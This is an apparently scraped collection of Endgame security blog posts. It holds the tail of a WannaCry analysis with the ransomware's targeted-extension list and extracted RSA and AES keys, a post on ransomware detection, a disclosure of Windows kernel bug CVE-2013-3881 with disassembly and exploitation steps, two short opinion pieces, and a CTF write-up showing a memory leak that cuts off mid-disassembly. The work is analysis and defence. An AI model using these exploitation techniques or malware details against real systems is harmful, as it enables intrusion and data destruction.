.doc,.docx,.docb,.docm,.dot,.dotm,.dotx,.xls,.xlsx,.xlsm,.xlsb,.xlw,.xlt,.xlm,.xlc,.xltx,.xltm,.ppt,.pptx,.pptm,.pot,.pps,.ppsm,.ppsx,.ppam,.potx,.potm,.pst,.ost,.msg,.eml,.edb,.vsd,.vsdx,.txt,.csv,.rtf,.123,.wks,.wk1,.pdf,.dwg,.onetoc2,.snt,.hwp,.602,.sxi,.sti,.sldx,.sldm,.sldm,.vdi,.vmdk,.vmx,.gpg,.aes,.ARC,.PAQ,.bz2,.tbk,.bak,.tar,.tgz,.gz,.7z,.rar,.zip,.backup,.iso,.vcd,.jpeg,.jpg,.bmp,.png,.gif,.raw,.cgm,.tif,.tiff,.nef,.psd,.ai,.svg,.djvu,.m4u,.m3u,.mid,.wma,.flv,.3g2,.mkv,.3gp,.mp4,.mov,.avi,.asf,.mpeg,.vob,.mpg,.wmv,.fla,.swf,.wav,.mp3,.sh,.class,.jar,.java,.rb,.asp,.php,.jsp,.brd,.sch,.dch,.dip,.pl,.vb,.vbs,.ps1,.bat,.cmd,.js,.asm,.h,.pas,.cpp,.c,.cs,.suo,.sln,.ldf,.mdf,.ibd,.myi,.myd,.frm,.odb,.dbf,.db,.mdb,.accdb,.sql,.sqlitedb,.sqlite3,.asc,.lay6,.lay,.mml,.sxm,.otg,.odg,.uop,.std,.sxd,.otp,.odp,.wb2,.slk,.dif,.stc,.sxc,.ots,.ods,.3dm,.max,.3ds,.uot,.stw,.sxw,.ott,.odt,.pem,.p12,.csr,.crt,.key,.pfx,.der

Public RSA2 Key to Decrypt AES Key (Converted to Base64 for Display)

BwIAAACkAABSU0EyAAgAAAEAAQBDK00rBJwK2Z8e2l/tMqnv4c4aUPQV51F77LAnVgVYtPaDybZ3W4BhGByrFNVq/TtwnRM/LiET8eev4/urbkNxJW0dUtYFXxMnniiJ9sqQkwpoxN6Cm6rCggKxGGABYxu8cY2+ZIhe1Q1swZzJATaJyYA3jx2JZ08MsTxhCToCXbhO9YgKn4wKht+R/s2fo6AT0y0wd9HwqNerluVIljcDaWSXBlwnUIyRdmeFOmxqslkSCmHyoe6oJMjksRFt1sz3j0xesFWEgW1gRYQP/N/5J6VSyVsGKKPedAPWx3Jm3L6kHv8glu1RhADMnDZk8oVNzzZg3ciw8ZHbeguD7s/vGdcS2q6G2fkOvgKvePNbSb4MmK+1X9aKTAVIZJxA4Rz5PMTkQggtsriK5gtt35PMNOhIMJNd340usz015GYwrYvnID3gydlsNkt5uWTNvF4kSNSIkBw9F05lDOz7GyvsXMMG1mw52Gx+I59Ar0BhtPux9oLNoSa4jcg4j5QDTvu77Bde3Ub35/vfJSGtNb2bHbUBP06wILcjNnmBKTze4nbX5h+f6i2lxGqqQDANzP5Y6Ykoy9fknHu5UBenMSE7tJHzhKa9ngPK6c3uTSsp+gIP5yyuML2FzC0TgxJT0/NBTvUj1s5fQc2BfDvwSYG47o01PLrsksfuzyRjAfNK9Nnai+LApKV/2o88UBnswjNaj+57WumDepb9lEtpUJrSNNEJYUWWfdgSXqiuesAmpW/W5WSTAxOjKW0DJPfCielGRnKrVNzYx3UPLRMx522IoT6hLb7/25TRvW3jwlXHyvsrYzEXl0KRkyHdUyUdZMmVZNm1ep+jyuIPGWbkBLVNb10zdhzpIHFLIuBVXpFWVJQ8Njv9/qFi0N/TbpWL4ZbOT3x4OCteXxuMk4BabSNvbfcZiPGMPVIb2Ku01KCIDaz7evrCNcSnqVBiSqyYmzDhWTdRDG0odKwR2XA4LDXTuNnxt0+hNDaLKWE5NQBw3nPl1Ry7XrhgtnBJhXllRnqUgdbMEgWEQ0Bt/HdVjkX4PbmHp4nSWSjOFppT3J2Ck62xPLmmLaqdQ+zifcoyL08tXy5YOHcuKxsK+v55WoDhjSNnQP/T05V6FL6TG/jvN8LuyL9ZPJxdJbZE/2ub6bT9WYW68ToBBfE+Yg1/H+KBl2ZjkCC7lrTPRMd8fn0lLjE1iyoYq9JByTKqS8rvKB2/KpwcNgJrAg+n7RDAoNrPCXJZW8Y8+RV/qiIAcuClXHkGbmI1M4lWq1/x/ZNiToEePfwFaaQvURviyA6mhqK/naScs9yJs+Ow8Ndg1mzeaR7JsAKFltc1hjYWW+YF4fkL7SWA4AoExZZdNGxM8ODHt4qQPJiiepLqUekF7H08yc2qtmaz20jPfftt3QS5G5eevuFYZv3pcKz5/7YjF/3wNQxBOjiaLz8WKuipczB8OMnEfsZopHj+bQAoTjOH5bbJxT3sDpID6xWbOHO/D8F7WolR8Zdx9dXKRJ+H5901bcAfzVuTwQAO8aklyPboi8c=

AES Decrypted Key for Decrypting the DLL

BE E1 9B 98 D2 E5 B1 22 11 CE 21 1E EC B1 3D E6

Extracting Encrypted AES Key and Encrypted DLL from t.wrny

Image may be NSFW.
Clik here to view. Extracting Encrypted AES Key and Encrypted DLL from t.wrny

Hard Coded Public Key to Encrypt User Private Key (Converted to Base64 for Display)

BgIAAACkAABSU0ExAAgAAAEAAQB1l0w7hEbeLCr0lahdwM1t2tfUkh4TgjRqcI2PfPcEklV/8aInsp5BrJCAkRiTwrF7rSvz/6/bK1G+HaMn46dXCFq+wR32BPgcvluxZ/vkyNp1AHCxF3AkbAljdKxLCh1xrn+uZbjFhnnFfp+YYExSuSliyyMp7TGRdHt7CyYb8n1nv9p6QNryYU2UpX2tWWutnqM6OcZbbp/Suza19dJl9Sww2MEXva8oAJYgRqctYgMM19B1oAsH6tQfyujZTts48iZ1yxKmiHCb4eoy3PhxclBB5heBaCdCjt/l3qFy2Tv75Z0wEWmSzWAr4tVGPCjPnTBK9625+w+R/i6+GPHO

Dll Decrypt Private Key (Converted to Base64 for Display)

BgIAAACkAABSU0ExAAgAAAEAAQBDK00rBJwK2Z8e2l/tMqnv4c4aUPQV51F77LAnVgVYtPaDybZ3W4BhGByrFNVq/TtwnRM/LiET8eev4/urbkNxJW0dUtYFXxMnniiJ9sqQkwpoxN6Cm6rCggKxGGABYxu8cY2+ZIhe1Q1swZzJATaJyYA3jx2JZ08MsTxhCToCXbhO9YgKn4wKht+R/s2fo6AT0y0wd9HwqNerluVIljcDaWSXBlwnUIyRdmeFOmxqslkSCmHyoe6oJMjksRFt1sz3j0xesFWEgW1gRYQP/N/5J6VSyVsGKKPedAPWx3Jm3L6kHv8glu1RhADMnDZk8oVNzzZg3ciw8ZHbeguD7s/v

Other Files

Image may be NSFW.
Clik here to view. Screen Shot 2017-05-14 at 8.27.09 AM.png

Struct for SMB_TRANS2_PKT

Image may be NSFW.
Clik here to view. Struct for SMB_TRANS2_PKT

Screenshot of Shellcode in SMB1 Trans2 Packet Body

Image may be NSFW.
Clik here to view. Screenshot of Shellcode in SMB1 Trans2 Packet Body

↧

So You Wanna Stop Ransomware? Detailing Endgame Ransomware Protection

May 22, 2017, 10:52 am

≫ Next: Microsoft Win32k NULL Page Vulnerability Technical Analysis

≪ Previous: WCry/WanaCry Ransomware Technical Analysis

Last week, WannaCry left its mark across the globe, affecting hundreds of thousands of machines in over 100 countries. While it certainly has been more widespread than previous ransomware, WannaCry is just the latest example of the growing prevalence of ransomware. As I explained in a previous post, ransomware is now a billion dollar industry, and is only growing in popularity among attackers due to the risk calculus and profitable business model.

Although WannaCry included fairly unsophisticated ransomware, it leveraged the Eternal Blue SMBv1 exploit from the Shadow Brokers data dump to propagate to other hosts. It is important to catch these kinds of attacks as early as possible in the attack chain, but what happens when those steps are circumvented by extremely customized and sophisticated techniques? This is why a layered approach to detection and prevention is necessary. While Endgame's layered protection approach ensures that we have the means to prevent and detect threats throughout multiple steps of the attack chain, there needs to be an additional line of defense in the event that ransomware or other destructive malware manages to be invoked on a host. Endgame ransomware protection provides that capability.

Approach

The core functionality of ransomware often is different compared to other malware. Ransomware attackers have a very straightforward mission: make files inaccessible and collect ransom payments from the affected users in order to restore access. Therefore, the code can be as simple as modifying files and providing recovery capabilities. It often does not contain large amounts of, or any, code for network communications with a command and control server, evading endpoint defenses, persistence mechanisms, or user surveillance capabilities, all of which are common attributes of other types of malware. Because of this, simple ransomware often gets through other endpoint protection mechanisms. This, combined with the enormous impact of a ransomware campaign, means that defenders require specialized capabilities to detect and block ransomware activity on a host at runtime before critical data is lost.

Endgame has provided customers with ransomware protection in our endpoint agent, and will continually enhance this feature going forward. Our approach to solving this problem at runtime involves many pieces operating in parallel. I will discuss three of these in this post:

File operations
Shannon entropy
Anomaly scores

File operations will drive analysis of file data and metadata, Shannon entropy is utilized to make key observations regarding the file content in a mathematical context, and anomaly scores are derived from file entropy and a variety of other measurements and characteristics. These concepts combine to provide introspection into each active process and allows us to detect ransomware activity.

File Operations and Anomaly Scores

The first building block is to gain visibility on activities on the filesystem. While a Windows host is active, files are constantly being created, modified, and read in the background. These file operations contain a wealth of information that can serve as the foundation for any ransomware detection capability, but the number of operations that may occur in a minute can be in the tens or even hundreds of thousands. In the face of this deluge of data, filtering plays a crucial role in separating the signal from the noise.

Our filtering approach is based around the following three pieces of data:

Operation
Process
Anomaly scores

If we were to analyze a file every single time one is opened, closed, read, or modified, that would result in an overwhelming amount of redundant analysis. When it comes to ransomware, though, we are primarily concerned with whether a file has been modified. For the sake of data simplification, we group file modifications by the following high level operations:

Create
Write
Rename
Delete

Once we're limited to those four file operations, we attribute each incoming file operation to a single process. Since we are attempting to distinguish ransomware activity on a per-process basis, we need the means to analyze each relevant operation and how it relates to the process by which it was invoked. This grouping will help us maintain metrics on processes over time and quickly determine anomalous activity as it begins to occur.

Each file that is modified by a particular process, along with the process itself, is assessed a score that reflects the level of anomalous characteristics that were discovered through analysis. The effect that each characteristic has on the anomaly score will vary depending on how abnormal the characteristic is when compared to a particular baseline. This weighted score is based along a scale, with more anomalous attributes being weighted higher. The scale is derived from a combination of applied mathematics along with domain expertise honed through thorough manual and automated analysis of ransomware samples.

Image may be NSFW.
Clik here to view.

Several metrics are taken into account when compiling anomaly scores

Finally, the affected filepath provides several key data points that can be used to filter out and group file operations:

Directory
File extension
File name

Certain file directories might typically see higher volumes of data modifications than others. In these cases, we can opt for less rigorous analysis of these directories to avoid overtaxing our detector. There are also other directories that are only typically modified by one or more specific processes with a certain level of privileged access, so any processes modifying these directories that do not fit within the normal range would immediately appear to be anomalous.

Depending on the extension of the file that has been modified, a particular operation may be viewed as more or less relevant. For instance, consider a file with a known temporary file extension compared to a Word document file. Both files will be analyzed in the same manner, but a higher weight will be factored into any anomaly score calculations for operations relating to the Word document as opposed to those pertaining to the file with the temporary extension.

The number of unique file extensions, the number of files per unique file extension, and the specific file extensions that are modified all factor into the anomaly score for each process. A process that modifies several files across extensions that are known to be typically targeted by ransomware would generally be viewed as more anomalous than a process that modifies mostly temporary or helper files avoided by ransomware.

Shannon Entropy

While I could write a long-winded description of Shannon entropy and how it relates to file contents, I'd rather recommend this excellent write-up by Lance Mueller of ForensicKB instead. In short, entropy is a measure of the randomness of a specified set of data. The more random the data is, the higher its resulting entropy will be when it is calculated. Low-to-middle entropy data tends to contain only a subset of the 256 possible byte values (0x0 - 0xFF), while high entropy data contains byte values that span the entire range. This can be extrapolated to presume that typical file types (e.g. XML, HTML, TXT) will generally have lower entropy values than binary file types (e.g. EXE, DLL, MSI), among others.

Image may be NSFW.
Clik here to view.

High entropy Disney television show

So, how can entropy be used to help detect ransomware? For individual file types / extensions, we can devise expected entropy ranges based on manual inspection of the file specification as well as calculating the average entropy for a sufficiently large set of sample files. Since typical encryption algorithms produce high entropy output, we're interested in files that have been modified or created and now possess high entropy values that exceed their predetermined range (based on their file type). Also, if the average entropy of the files being modified by a given process is higher than the expected average entropy based off of their file types, this can be reasonably assessed as an even stronger indicator of potentially anomalous activity than that of a single file exceeding its typical entropy range.

Take for instance an XML file. XML files typically consist of text data that is represented by bytes within the ASCII range (0x0 - 0x7F), though they do not use the full extent of the characters within that range. As 8.0 bits / byte is the highest possible entropy value and 0.0 bits / byte is the lowest possible entropy value, we should generally expect XML files to fall somewhere within the middle range of possible entropy values due to its relatively limited usage of byte values.

Image may be NSFW.
Clik here to view.

Sample XML file (Entropy - 5.212 bits / byte)

Now, when that same file is run through an encryption algorithm (AES-256 in CBC mode in this instance), we can see that the contents become scrambled and incoherent, and no discernible words in English are readable.

Image may be NSFW.
Clik here to view.

XML file after AES-256 (CBC Mode) encryption (Entropy - 7.918 bits / byte)

It should come as no surprise, then, that the entropy value has significantly increased from 5.212 to 7.918. For a file type such as XML, the encrypted entropy value far exceeds its expected range and is much closer to being perfectly random than a normal file of its type should be, which would come across as very anomalous to our protection feature.

Detection of high entropy is not a complete solution. Compressed data must be handled. It tends to possess high entropy, so the acceptable entropy range for certain file types needs to be adjusted. This makes it difficult to tell the difference between compressed data and encrypted data. While Monte Carlo pi approximation, chi square distribution, and other calculations may help distinguish between encrypted and compressed content, the additional overhead introduced by these calculations may cause unacceptable slowdown when processing thousands of files per minute.

Another issue is that there are also ransomware variants that employ encryption routines which produce much lower entropy data than typical encryption algorithms, so a file lacking high entropy is not definitively an indicator that it is likely benign. Other approaches are needed to deal with this case, which are beyond the scope of this post.

Entropy is not the be-all, end-all measurement that can affirm whether or not a file contains encrypted content, but it provides a very useful window through which we can gather further evidence of processes that may be modifying files in an abnormal manner.

Additional Screening

Each file operation will be subjected to further proprietary anomaly screening beyond filepath and entropy analysis, which results in modifications to the file anomaly score. The additional data that is yielded, when combined with the results of filepath and entropy analysis, provides an extensive overview of a given file operation and allows for immediate detection of anomalous behavior. Various approaches were tested and integrated into our scoring throughout our research, leading to the scoring system in the product today.

Image may be NSFW.
Clik here to view.

Analysis underway...

How It All Comes Together

As each file operation passes through our ransomware-detecting Rube Goldberg machine, all necessary data associated with the affected file will be extracted and analyzed, and a minimal amount of data summarizing the operation is maintained for posterity. The file's anomaly score will then be logged and added to the process anomaly score.

Image may be NSFW.
Clik here to view.

Artistic Representation of Detection Algorithm

In the event that the process anomaly score meets or exceeds a predetermined threshold, the process will be suspended immediately. A pop-up dialog will alert the user to the suspended ransomware activity and provide them with the option to terminate or resume the offending process.

Image may be NSFW.
Clik here to view.

Ransomware Protection Popup Dialog

Since our ransomware protection feature is driven by analyzing file operations at a high level, it will work irrespective of the type of process. Whether the process originates from a .NET binary, fileless malware (Powershell, JavaScript, VBScript), or a standard executable, Endgame ransomware protection will be able to track all operations needed to quickly determine whether anomalous activity has occurred on a system. Our solution does not interfere with normal system and application operation and introduces minimal CPU and memory overhead. We also handle all of this with a very low false positive rate. Earlier variants of our scoring algorithm sometimes experienced false positives with software compilation, filesystem cleanup utilities, and other applications which create or destroy a very large number of files in a short period of time. A large amount of tuning was required to maintain a very low FP rate for customers.

Case Study: WannaCry

When WannaCry began grabbing headlines earlier in May, as we detailed, our research team immediately obtained the dropper and the core encryptor binary (tasksche.exe) in order to perform offline testing against our ransomware protection feature. The embedded video below walks through launching the encryptor on a virtual machine with ransomware protection enabled.

Endgame Ransomware Protection at Work

Endgame ransomware protection detects the presence of ransomware activity on the machine quickly after the encryptor launched and before thousands or even hundreds of files could be encrypted. The speed with which the ransomware is detected and mitigated protects against critical data loss, expediting the return to business as usual. An alert containing detailed process activity data is also generated and sent back to the Endgame sensor management platform, allowing for further triage of the ransomware and the workflow which resulted in it being invoked on the system. In addition to MalwareScore™, Endgame ransomware protection serves as another line of defense against extensive critical data loss caused ransomware such as WannaCry.

Conclusion

As long as ransomware remains a profitable criminal venture, attackers will continue to pursue new means to compromise networks and deploy ransomware. Just like other forms of malware, ransomware can be stopped at various points along the attack chain. However, given the customization of techniques, and persistence of targeted attackers, it is essential to be able to provide an additional line of defense. Endgame’s ransomware protection provides this, integrating detection techniques based on filepaths, entropy, and our own proprietary algorithms to protect against the broad range of ransomware in the wild today. As the WannaCry example demonstrates, our ransomware protection is effective at stopping well known but also emergent strains of ransomware.

↧

Microsoft Win32k NULL Page Vulnerability Technical Analysis

October 9, 2013, 11:30 am

≫ Next: Android Is Still the King of Mobile Malware

≪ Previous: So You Wanna Stop Ransomware? Detailing Endgame Ransomware Protection

Endgame has discovered and disclosed to Microsoft the Win32 NULL Page Vulnerability (CVE-2013-3881), which has been fixed in Microsoft’s October Security Bulletin, released October 8, 2013. The vulnerability was the result of insufficient pointer validation in a kernel function that handles popup menus. Successfully exploiting this vulnerability would allow an attacker with unprivileged access to a Windows 7 or Server 2008 R2 system to gain access to the Windows kernel, thereby rendering user account controls useless.

Affected Versions

In previous versions of Windows, including XP, Server 2003, Vista, and Server 2008 R1, Microsoft actually included code that adequately verified the pointer in question. However, in Windows 7 (and Server 2008 R2), that check was removed, leading to the exploitable condition.

If the product line ended there, it would be easy to imagine that this was an inadvertent removal of what a developer mistakenly thought was a redundant check and to give it little additional thought. However, in the initial release of Windows 8 (August 2012), the pointer validation had been put back in place, long before we reported the bug to Microsoft. We would assume that when a significant security issue comes to light, Microsoft would simultaneously fix it across all affected products. Unless the Windows 8 win32k.sys code was forked from a pre-Windows 7 base, this bug was fixed upstream by Microsoft prior to our disclosure. This is purely speculative, but if our previous supposition is true, they either inadvertently fixed the bug, or recognized the bug and purposely fixed it, but failed to understand the security problem it created.

Mitigation

The good news for Windows users is that Microsoft does have a realistic approach to dealing with vulnerabilities, which resulted in some protection even prior to the release of this patch. One of the simplest security features (at least in concept, if not in implementation) that Microsoft introduced in Windows 8 was to prohibit user applications from mapping memory at virtual address zero. This technique takes the entire class of null-pointer-dereference kernel bugs out of the potential-system-compromise category and moves them into the relatively benign category of user-experience/denial-of-service problems. When Microsoft back-ported this protection to Windows 7, they eliminated the opportunity to exploit this bug on 64-bit systems. This illustrates how the conventional wisdom that “an ounce of prevention is worth a pound of cure” can be turned on its ear in the world of software vulnerabilities. Microsoft will undoubtedly be fixing null pointer dereferences in their products for as long as they support them. However, by applying a relatively inexpensive “cure”, they have limited the consequences of the problems that they will spend years trying to “prevent”.

Impact

Part of what makes this type of vulnerability so valuable to attackers is the proliferation of sandbox technologies in popular client-side applications. We have confirmed that this vulnerability can be exploited from within several client-side applications’ sandboxes, including Google Chrome and Adobe Reader, and from Internet Explorer’s protected mode. On the surface, that sounds like bad news. On the other hand, we would not have even considered that question if these mitigation technologies were not making it more difficult for attackers to compromise systems. In order to completely own a target via one of those applications, an attacker must have a vulnerability that leads to code execution, another that allows them to leak memory so as to defeat Microsoft’s memory randomization feature, and finally, a vulnerability like the one described here that allows them to escape the hobbled process belonging to the initial target application.

Technical Details

When an application displays a popup or context menu, it must call user32!TrackPopupMenu or user32!TrackPopupMenuEx in order to capture the action that the user takes relative to that menu. This function eventually leads to the xxxTrackPopupMenuEx function in win32k.sys. Since it is unusual to simultaneously display multiple context menus, there is a global MenuState object within win32k.sys that is ordinarily used to track the menu. However, since it is possible to display multiple context menus, if the global MenuState object is in use, xxxTrackPopupMenuEx attempts to create another MenuState object with a call to xxxMNAllocMenuState. xxxTrackPopupMenuEx saves the result of this allocation attempt and checks to ensure that the result was not 0, as seen in the most recent unpatched 64-bit Windows 7 version of win32k.sys (6.1.7601.18233):

xxxTrackPopupMenuEx+364 call xxxMNAllocMenuState

xxxTrackPopupMenuEx+369 mov r15, rax

xxxTrackPopupMenuEx+36C test rax, rax

xxxTrackPopupMenuEx+36F jnz short alloc_success

xxxTrackPopupMenuEx+371 bts esi, 7

xxxTrackPopupMenuEx+375 jmp clean_up

In the event that the allocation fails, the function skips to its cleanup routine, which under normal circumstances will cause a BSOD when the function attempts to dereference unallocated memory at r15+8:

xxxTrackPopupMenuEx+9BA clean_up: ; CODE XREF:

xxxTrackPopupMenuEx+375j

xxxTrackPopupMenuEx+9BA bt dword ptr [r15+8], 8

However, if we can allocate and correctly initialize the memory mapped at address zero for the process, we can reliably gain arbitrary code execution when the function passes the invalid MenuState pointer to xxxMNEndMenuState.

xxxTrackPopupMenuEx+A76 mov rcx, r15 ;pMenuState

xxxTrackPopupMenuEx+A79 call xxxMNEndMenuState

It is possible to reliably create circumstances in which the xxxTrackPopupMenuEx call to xxxMNAllocMenuState will fail. After creating two windows, we use repeated calls to NtGdiCreateClientObj in order to reach the maximum number of handles that the process is allowed to have open. Once we have exhausted the available handles, we attempt to display a popup menu in each of the two previously created windows. Since the global MenuState object is not available for the second window’s menu, xxxTrackPopupMenuEx calls xxxMNAllocMenuState in order to create a new MenuState object. Because there are no available handles due to our previous exhaustion, this call fails and xxxMNEndMenuState is called with a parameter of 0, instead of a valid pointer to a MenuState object.

↧

Android Is Still the King of Mobile Malware

May 7, 2014, 11:30 am

≫ Next: Verizon's Data Breach Investigations Report: POS Intrusion Discovery

≪ Previous: Microsoft Win32k NULL Page Vulnerability Technical Analysis

According to F-Secure’s “Q1 2014 Mobile Threat Report”, the Android operating system was the main target of 99% of new mobile malware in Q1 2014. The report states that between January 1 and March 31, F-Secure discovered 275 new malware threat families for Android, compared to just one for iOS and one for Symbian. In the same report from Q1 2013, F-Secure identified 149 malware threat families with 91% of them targeting Android. Not only are malware threats proliferating, but the amount of malware specifically targeting Android devices is also increasing.

It’s true that Android malware is becoming more advanced and harder to mitigate. But all the same, the numbers tell a bleak story for Android users. Why are there so many more malware threat families for Android than for iOS? The advantage iOS has over Android in terms of malware protection is Apple’s App store, where all applications are fully vetted and tested before public release. This system has had a significant impact on preventing malware infections for iOS users. Since a large number of Android apps come from third-party sources, it’s more difficult for Google to monitor and control all of the Android apps being downloaded by consumers. As long as Android continues to allow users to download apps from third parties where “criminal developers” can distribute their applications, we’re likely to continue to see an increase in the number of Android malware threats. It will be interesting to see what F-Secure’s Q2 report brings.

↧

Verizon's Data Breach Investigations Report: POS Intrusion Discovery

May 11, 2014, 11:30 am

≫ Next: DEFCON Capture the Flag Qualification Challenge #1

≪ Previous: Android Is Still the King of Mobile Malware

Verizon recently released its 2014 Data Breach Investigations Report. I could spend all day analyzing this, but I’ll touch on just one issue that’s been on many of our minds recently: Point-of-Sale (POS) intrusion.

Aside from Verizon’s assertion that the number of POS intrusions is actually declining (contrary to popular perception), I was most intrigued by the following statement: “Regardless of how large the victim organization was or which methods were used to steal payment card information, there is another commonality shared in 99% of the cases: someone else told the victim they had suffered a breach.”

What does that say for the wide array of network defense software currently deployed around the globe? An organization’s security posture is clearly flawed if the vast majority of compromises are discovered by outside parties (the report stated that law enforcement was the leading source of discovery for POS intrusions). It is especially troubling that even large organizations don’t spot intrusions, because they likely have the resources to purchase the best security tools available. Either companies aren’t prioritizing security, or the available tools are failing them.

The bottom line is that with all the network security tools out there, no one has shown much success at thwarting POS attacks in real time. If we assume the POS targets were PCI compliant, then they must have had, at a minimum, 12 security requirements from 6 control objectives (per the PCI Data Security Standard: Requirements and Security Assessment Procedures Version 3.0).

Despite these security measures being critical first lines of defense, in many situations they are not enough to thwart the most aggressive threats. Attackers were still able to enter the networks and extract sensitive consumer information. It seems likely that network defenders will continue to be unaware of nefarious acts taking place within their own networks until more intelligent network security solutions become the standard. Detection, analysis, and remediation need to happen in real time, rather than continuing to be a post-mortem affair.

↧

DEFCON Capture the Flag Qualification Challenge #1

May 20, 2014, 11:30 am

≫ Next: Telecom as Critical Infrastructure: Looking Beyond the Cyber Threat

≪ Previous: Verizon's Data Breach Investigations Report: POS Intrusion Discovery

I constantly challenge myself to gain deeper knowledge in reverse engineering, vulnerability discovery, and exploit mitigations. By day, I channel this knowledge and passion into my job as a security researcher at Endgame. By night, I use these skills as a Capture the Flag code warrior. I partook in the DEFCON CTF qualification round this weekend to help sharpen these skills and keep up with the rapid changes in reverse engineering technology. DEFCON CTF qualifications are a fun, and sometimes frustrating, way to cultivate my skillset by solving challenges alongside my team, Samurai.

CTF Background

For those of you who aren’t familiar with a computer security CTF game, Wikipedia provides a simple explanation. The qualification round for the DEFCON CTF is run jeopardy style while the actual game is an attack/defense model. Qualifications ran all weekend for 48 hours with no breaks. Since 2013 the contest has been run by volunteers belonging to a hacker club called the Legitimate Business Syndicate, which is partly comprised of former Samurai members. They did a fantastic job with qualifications this year and ran a smooth game with almost no downtime, solid technical challenges, round the clock support and the obligatory good-natured heckling. As a fun exercise, let’s walk through an interesting problem from the game. All of the problems from the CTF game can be found here.

Problem Introduction

The first challenge was written by someone we’ll call Mr. G and was worth 2 points. Upon opening the challenge you are presented with the following text:

http://services.2014.shallweplayaga.me/shitsco_c8b1aa31679e945ee64bde1bdb19d035 is running at:

shitsco_c8b1aa31679e945ee64bde1bdb19d035.2014.shallweplayaga.me:31337

Capture the flag.

Downloading the shitsco_c8b1aa31679e945ee64bde1bdb19d035 file and running the “file” command reveals:

user@ubuntu:~$  file shitsco

shitsco: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0x8657c9bdf925b4864b09ce277be0f4d52dae33a6, stripped

This is an ELF file that we can assume will run on a Linux 32-bit OS. Symbols were stripped to make reverse engineering a bit more difficult. At least it is not statically linked. I generally like to run strings on a binary at this point to get a quick sense of what might be happening in the binary. Doing this shows several string APIs imported and text that looks to be indicative of a command prompt style interface. Let’s run the binary to confirm this:

user@ubuntu:~$  ./shitsco
Failed to open password file: No such file or directory

Ok, the program did not do what I expected. We will need to add a user shitsco and create a file in his home directory called password. I determined this by running:

shitsco@ubuntu:~$  sudo strace ./shitsco
…
open("/home/shitsco/password", O_RDONLY) = -1 ENOENT (No such file or directory)
…

We can see that the file /home/shitsco/password was opened for reading and that this failed (ENOENT) because the file did not exist. You should create this file without a new line on the end or you might have trouble later on. I discovered this through trial and error. After creating the file we get better results:

shitsco@ubuntu:~$  echo –n asdf > /home/shitsco/password
shitsco@ubuntu:~$  ./shitsco

  oooooooo8 oooo        o88    o8
888         888ooooo   oooo o888oo  oooooooo8    ooooooo     ooooooo
 888oooooo  888   888   888  888   888ooooooo  888     888 888     888
        888 888   888   888  888           888 888         888     888
o88oooo888 o888o o888o o888o  888o 88oooooo88    88ooo888    88ooo88

Welcome to Shitsco Internet Operating System (IOS)
For a command list, enter ?

$ ?
==========Available Commands==========
|enable                               |
|ping                                 |
|tracert                              |
|?                                    |
|shell                                |
|set                                  |
|show                                 |
|credits                              |
|quit                                 |
======================================
Type ? followed by a command for more detailed information
$

This looks like fun. We have what looks to be a router prompt. Typically, the goal with these binary exploitation problems is to identify somewhere that user input causes the program to crash and then devise a way to make that input take control over the program and reveal a file called flag residing on the remote machine. At this point, I have two choices. I can play around with the input to see if I can get it to crash or I can dive into the reverse engineering. I opted to play around with the input and the first thing that caught my attention was the shell command!

Welcome to Shitsco Internet Operating System (IOS)
For a command list, enter ?
$ shell
bash-3.2$

No way, it couldn’t be that easy. Waiting 5 seconds produces:

Yeah, right.

Ok, let the taunting begin. We can ignore the shell command. Thanks for the laugh Mr. G. By playing with the command line interface, I found the command input length was limited to 80 characters with anything coming after 80 characters applying to the next command. The set and show commands looked interesting, but even adding 1000 variables of different lengths failed to produce any interesting behavior. Typically, I am looking for a way to crash the program at this point.

What really looked like the solution came from the enable command:

$ enable
Please enter a password: asdf
Authentication Successful
# ?
==========Available Commands==========
|enable                               |
|ping                                 |
|tracert                              |
|?                                    |
|flag                                 |
|shell                                |
|set                                  |
|show                                 |
|credits                              |
|quit                                 |
|disable                              |
======================================
Type ? followed by a command for more detailed information
# flag
The flag is: foobarbaz

The password for the enable prompt comes from the password file we created earlier. I also created a file in /home/shitsco/ called flag with the contents foobarbaz; which is now happily displayed on my console. The help (? command) after we enter “enabled mode” has two extra commands: disable and flag. So, if I can get the enable password on the remote machine, then I can simply run the flag command and score points on the problem. Ok, we have a plan, but how to crack that password?

The “Enable” Password

To recover this password, the first option that comes to mind is brute force. This is usually an option of last resort in CTF competitions. Just think about what could happen to this poor service if 1000 people decided to brute force the challenge. Having an inaccessible service spoils the fun for others playing. It’s time to dive a bit deeper and see if there is anything else we could try.

I tried long passwords, passwords with format strings such as %s, empty passwords, and passwords with binary data. None of these produced any results. However, a password length of 5 caused a strange behavior:

$ enable
Please enter a password: AAAAA
Nope.  The password isn't AAAAA▒r▒@▒r▒▒ο`M_▒`▒▒▒t▒

Ok, that looks like we’re getting extra memory back. If we look at it as hex we see:

shitsco@ubuntu:~$  echo -e enable\\nAAAAA\\n | ./shitsco | xxd
…
0000220: 2020 5468 6520 7061 7373 776f 7264 2069    The password i
0000230: 736e 2774 2041 4141 4141 f07c b740 f47c  sn't AAAAA.|.@.|
0000240: b792 90c1 bf60 c204 0808 8d69 b760 c204  .....`.....i.`..
0000250: 08a0 297f b701 0a24 200a 3a20 496e 7661  ..)....$ .: Inva
0000260: 6c69 6420 636f 6d6d 616e 640a 2420       lid command.$

The bit that starts 0xf0 0x7c is the start of the memory disclosure. Looking a little further, we see 0x60 0xc2 0x04 0x08. This looks like it could be a little endian encoded pointer for 0x0804c260. This is pretty cool and all, but where is the password?

I tried sending in all possible password lengths and it was always leaking the same amount of data. But the leak only worked if the password is more than 4 characters. It’s time to turn to IDA Pro and focus in on the function for the enable command.

This is the disassembly for the function responsible for handling the enable command. It is easy to find with string cross references:

.text:08049230 enable          proc near               ; DATA XREF: .data:0804C270o
.text:08049230
.text:08049230 dest            = dword ptr -4Ch
.text:08049230 src             = dword ptr -48h
.text:08049230 n               = dword ptr -44h
.text:08049230 term            = byte ptr -40h
.text:08049230 s2              = byte ptr -34h
.text:08049230 var_14          = dword ptr -14h
.text:08049230 cookie          = dword ptr -10h
.text:08049230 arg_0           = dword ptr  4
.text:08049230
.text:08049230                 push    esi
.text:08049231                 push    ebx
.text:08049232                 sub     esp, 44h
.text:08049235                 mov     esi, [esp+4Ch+arg_0]
.text:08049239                 mov     eax, large gs:14h
.text:0804923F                 mov     [esp+4Ch+cookie], eax
.text:08049243                 xor     eax, eax
.text:08049245                 mov     eax, [esi]
.text:08049247                 test    eax, eax
.text:08049249                 jz      loc_80492D8
.text:0804924F                 lea     ebx, [esp+4Ch+s2]
